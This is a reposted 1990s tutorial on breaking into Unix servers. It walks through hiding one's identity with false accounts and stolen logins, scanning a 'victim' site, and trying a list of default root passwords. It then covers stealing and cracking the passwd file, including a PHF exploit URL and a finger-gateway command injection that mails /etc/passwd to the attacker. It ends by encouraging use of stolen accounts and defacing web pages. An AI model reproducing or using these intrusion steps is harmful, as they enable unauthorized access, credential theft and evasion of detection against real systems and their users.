The Best Ever Hacking Tutorial

DO NOT TRY THIS AT HOME : https://wired4geeks.wordpress.com Tuts. files and message bases are for INFORMATIONAL PURPOSES ONLY. DO NOT undertake any project based upon any information obtained from this or any other web site.We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
(192 votes)
In 27 Favorites Lists
Viewed 12445 times

DISCLAIMER!!!: This document is intended for educational purposes. I do not promote computer crime and I’m not responsible for your actions in any way. If you want to hack a computer, please ask for permission first

Hey guys this Hacking tutorial is not by me but by Overlord.

By Overlord, © June, 1998. The latest version of this guide is always avaliable from http://www.cyberarmy.com/. You are free to distribute this page on your site, all I ask is that you leave this notice here and place a link to http://www.cyberarmy.com on your site.

_____________________________________________________

INTRODUCTION:

A little background is needed before we get into hacking techniques.

When we talk about ‘Hacking’, we are talking about getting some access on a server we shouldn’t have. Servers are set up so that many people can use them. These people each have different ‘accounts’ on the server – like different directories that belong just to them. If Fred has an account with the acme.net ISP (Internet Service Provider), he will be given:

(1) a login name, which is like the name of your directory; and
(2) a password, which lets you get access to that directory.

This login name and password will usually give you access to all of Fred’s services – his mail, news services and web pages. There is also the ‘root’ account, which has it’s own login and password. This gives super-user access to the entire server. We will focus on ‘getting root’, in this help file.

_____________________________________________________

THE ANATOMY OF THE ’HACK’:

There are two main ways to break into a system. Think of a server as a Swiss Bank Vault. There are two main ways to get in. You can try to get in by finding the combination of the vault. This is like finding the password. It’s how you are meant to get in. The second way is by using dynamite. You forget all about the ‘proper’ way to get in. This is like using ‘exploits’, or weaknesses in the servers operating system to gain access.

_____________________________________________________

’DON’T GET CAUGHT’:

Hacking is illegal, and it is very easy to trace you if acme.net realizes you hacked them. Wherever you go,
your IP number (your computer’s unique identification) is left and often logged. Solutions:

1. When you set up your account with an ISP, give a false name and address. Or, even better, sign up for an anonymous dial-up account from anonymizer.com

2. Hack using a filched account (stolen password, etc.). A tool called Dripper from http://www.cyberarmy.com can steal passwords for you from public net cafes and libraries.

3. Port your connection through something else.

An easy way to do this is to change your proxy settings. By using the proxy settings meant for a different ISP, it can look like you are surfing from wherever that ISP is. A list of proxies you can use is here.

You should also do any important info gathering through the IP Jamming Applet on the Cyberarmy.Com to hide your IP.

If you want super anonymity, you should be surfing in an account you set up under a false name, with your proxy settings changed, and also surfing through the IP Jamming applet! Be aware that some ISPs could use Caller ID to test the number of someone logging on. Dial the relevant code to disable Caller ID before calling your ISP.

_____________________________________________________

INFO GATHERING:

To start off, you will probably need to gather information about www. acme.net using internet tools.

_____________________________________________________

DIRT DIGGING STAGE:

We are now taking the first steps of any hack… Info Gathering.

You should be set up for stealth mode. Get a notepad, and open a new browser window (through the IP Jammer). Bring the www. acme.net ’s web page up in the IP Jammer’s window. You can load the IP Jamming applet on the Cyberarmy.Com.

_____________________________________________________

CASE THE JOINT:

1. First, check out the site. Take down any email addresses, copy down the HTML of important pages.

2. Send a mail that will bounce to the site. If the site is www. acme.net , send a mail to blahblahblah@ acme.net . It will bounce back to you and give you information in its header.

Copy the information from the headers down.

(To maintain anonymity, it might be a good idea to send and receive the mail from a free web based provider, such as hotmail.com. Use full stealth features when sending the bouncing mail. This will protect you when they check through the logs after they are hacked.)

3. Still using stealth features, Traceroute acme.net . This Traceroute search is avaliable from the Hacker’s Home Page, in the Net Tools section.This will tell you the upstream provider of the victim server.

4. Still using stealth features, Whois the site. This Whois search is avaliable from the Hacker’s Home Page, in the Net Tools section. This will give you information on the owners and servers that run the site. Write it down.

5. Finger the site. Use this finger service at Cyberarmy.Com to check the site. Try fingering just with “finger @ acme.net ” first. This sometimes tells you the names of all accounts. If this does not work, try fingering any email addresses you found on the site, and through Whois. This will sometimes give you useful information.

6. Now, we’re about to get rough on the site. Port Scan the site.

Port scanning checks for all open ports for an IP. It is extremely useful, however, it practially screams to the webmaster’s of the victim site that they are in the middle of being hacked. The is basically no legitimate reason to port scan a site unless you are about to hack it.

There are no very good ways to hide a port scan, but there are a few semi-stealthy port scanners. Most are only for Linux / Unix systems. However, the Exploit Generator for Windows is one that claims to be stealthy. However, if you are trying to enter a very secure site, perhaps forget about port scanning for now, unless you are running Linux.

Though, port scan will tell you all the services a site is running. If port 21 is open, it means they have an FTP server. If port 23 is open, it means they have telnet.

7. The aim of telnetting to the site is basically to try and find out the server type. While your browser is in stealth mode, use the Anonymous Telnet applet in the Cyberarmy.Com to open a Telnet window.

Telnet to the site to Port 23. Usually, if the address is “www. acme.net ”, try telnetting to ” acme.net “. If this does not work, try to telnet to telnet. acme.net or try telnetting to any of the sites listed as name servers in your previous Whois search. Once you have got access, note any information it gives you, such as server type.

_____________________________________________________

TELNETTING:

Now change the telnet to port 21. This should send you straight in to the server’s FTP port. If this works, try typing SYST to find out what server type it is.

Now, if you are lucky, try telnetting to port 80, the HTTP port. Note if this gives you any information.

_____________________________________________________

RUNNING LAME PROGRAMS:

You *need* to know the server type to have any hope of hacking the thing. How do you expect to run exploits against it if you cant even figure out what you’re dealing with here?

A final resort is to run a program called Whats Running? It doesn’t work very well, but will sometimes tell you the server type. It will also probably be logged by the victim server.

If that doesn’t work, do anything to find the server type. Even write them an e-mail asking what operating system they’re running.

_____________________________________________________

HACKING THROUGH THE PASSWORD:

We will now try to go through the front door of the server. As to our analogy, we are trying to find the combination of the safe.

_____________________________________________________

EASY THINGS FIRST:

You would kick yourselves if ya spent weeks trying advanced hacking with exploits, IP spoofing and social
engineering, just to find that we could have got in by using:

$Login: root
$Password: root

So, let’s just try this first and get it out of the way. Unix comes set up with some default passwords, and
sometimes these are not changed. So, we telnet to acme.net .

Don’t use your usual telnet program. Unless you are using a filched or anonymous account, it will show
your IP address to acme.net . With your proxies changed, and everything set for stealth, switch back to the Anonymous Telnet window.

Then try the following accounts and passwords:

ACCOUNT: PASSWORD
(login) root: (password)root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon

The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level accounts, meaning they have sysop power, or total power. Other logins are just “user level” logins meaning they only have power
over what files/processes they own.

_____________________________________________________

USING THE LOGIN NAMES:

Still simple things first. About 1 in 20 people are stupid enough to have the same login name and password. With your list of all the email addresses or finger information you dug from the site, try this.

For example, if the web site made a reference to fred@ acme.net , try logging in (through telnet or a FTP
program to their server) as:

$Login: Fred
$Password: Fred

Do this with all the names you have found – you might get lucky.

_____________________________________________________

GETTING THE PASSWD FILE:

You probably had no luck until now. Actually, most hacking techniques only have a slim chance of success. You just try hundreds of slim chances till you get it.

Assuming you were trying to log in on a Unix system, you may have been wondering how Unix checks to see whether the passwords you gave were correct or not. There is a file called ‘passwd’ on each Unix system which has all the passwords for each user. So, if we can’t guess the passwords, we will now try to rip this file and decrypt it.

_____________________________________________________

ANCIENT CHINESE FTP METHOD:

Your browser should be set to use the fake proxies. We will keep using this browser to FTP, because it cannot be easily traced, whereas something like CuteFTP can be traced to you because it can’t use proxies. If in your port scan, you found an opne port 21, its a pretty good indication that they run an FTP server.

Using your stealth browser, try to FTP to acme.net . Example: ftp:// acme.net

If that does not work, try to FTP to ftp. acme.net . Example: ftp://ftp. acme.net

If that does not work, try to FTP to the Domain Name Servers listed when you did your WHOIS search. Example: ftp://ns1. acme.net

Now you are connected to acme.net ’s FTP server, click on their \etc directory.

You should see a file called ‘passwd’ and maybe a file called ‘group’. Download the ‘passwd’ file, and
look at it.

If it looks like this when you open it, you are in luck:

root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]

For example, we know a login is “kangaroo” and their encrypted password is “3A62i9qr”. Note – this is not their password, but an encrypted form of their password.

Or, did it look more like this:

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh

Is the second, encrypted password, section replaced by *’s or x’s? This is bad – it is called a shadowed
password and cannot be decrypted. This is how most passwd files are now days. However, if you got a
passwd file which has some non-shadowed entries, you can put your hand to decrypting it.

_____________________________________________________

DECRYPTING PASSWD FILES:

There are a few programs around which were written to decrypt Unix passwd files. The most famous one was called ‘Cracker Jack’. Many ‘hacking’ texts strongly recommend this file – but they are mostly talking rubbish. Its old and most systems will just crash when they try to run it, as it uses weird memory allocation.

The best Unix cracker around is currently called ’John the Ripper 1.5’. It is readily avaliable. It was only written in the last year or so, and is a lot faster than Cracker Jack ever was. John the Ripper was also designed with Pentiums in mind, and the brute force techique used is genius. But you have to go down to DOS to use it.

You will also need a large ‘wordfile’, with every English word. Bigger the better. The Crack Programs test every word in the wordfile against the passwd file. If the wordfile is big enough, you have a good chance of getting a password.

_____________________________________________________

THE OLD-STYLE PHF TECHNIQUE:

Although most servers have now trashed a program called PHF, let’s just make sure… It is is working, it lets you get the passwd file remotely, even if it is inside hidden and root access only directories.

In the Overlord Anonymizer, type:

http://www. acme.net /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd.

If PHF is active (often not), this string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it.

Now, if you see the words ’Smile! You’re on Candid Camera!’, it means that the server is protected against this hack, and has logged your IP. But don’t worry. So long as you were using the anonymizer, you are safe.

_____________________________________________________

FINGER BOX HACKING:

Finger servers are hacker’s friends. Let’s find out whether www. acme.net has a finger server.

In the Anonymizer, assuming that the server’s name starts with www, type www. acme.net /cgi-bin/finger

If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have another chance to receive the etc/passwd file.

Okay, 1/ get your list of e-mail addresses you found for the site (let’s pretend one of them is “kangaroo@ acme.net “, and that your email address is “your@email.org”)

2/ Go back to the finger box, and type this in (changing these email addresses for the real ones):

kangaroo@ acme.net ; /bin/mail your@email.org < etc/passwd

This takes the passwd file through kangaroo@ acme.net and emails it to your email address. If this works you now have the etc/passwd file in your mailbox…. you can now run a crack program against it and have a little fun on their box.

_____________________________________________________

THE END:

If you now have the login code and password, you may use the users mail account, FTP priviliges (change their web pages by uploading new ones), and HTTP access.

(If you have only got access to a user level account, do not despair. If you have a user level account, it is easy to use that to later get a root level account. More on this when this study is made bigger).

_____________________________________________________
Subscribe for great tuts.

Advertisements
Comments
  1. root@ says:

    hey thanx 4 sharing .

  2. Beaches and mojitos are the excellent combination to have a relaxing travel experience

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s